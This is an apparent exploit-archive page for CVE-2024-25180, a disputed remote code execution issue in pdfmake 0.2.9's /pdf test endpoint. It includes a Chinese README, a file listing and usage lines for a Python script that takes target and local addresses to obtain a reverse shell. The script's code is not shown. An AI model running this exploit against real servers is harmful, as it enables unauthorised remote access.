CVE-2024-25180 PoC — pdfmake 安全漏洞

Source

https://github.com/dustblessnotdust/CVE-2024-25180

Associated Vulnerability

Title:pdfmake 安全漏洞 (CVE-2024-25180)
Description:An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the /pdf endpoint. NOTE: this is disputed because the behavior of the /pdf endpoint is intentional. The /pdf endpoint is only available after installing a test framework (that lives outside of the pdfmake applicaton). Anyone installing this is responsible for ensuring that it is only available to authorized testers.

Readme

# CVE-2024-25180

## 概述
pdfmake是一个纯 JavaScript 客户端/服务器端 PDF 打印
此软件包的受影响版本容易受到任意代码注入攻击，攻击者可以通过向路径发送精心设计的 POST 请求来执行任意代码/pdf。攻击者可以通过发送精心设计的请求在系统上执行任意代码。

CVE-2024-25180 Remote Code Execution in pdfmake

## 脚本利用
```
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>

python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
```
监听80端口，即可获取反弹shell

![image](https://github.com/user-attachments/assets/42e08e9e-ebe7-41c7-84f3-424558754b75)

File Snapshot


 [4.0K]  /data/pocs/06ba9fcdd499eeb7d25b82827db657e4667483d3
├── [ 890]  CVE-2024-25180.py
└── [ 683]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!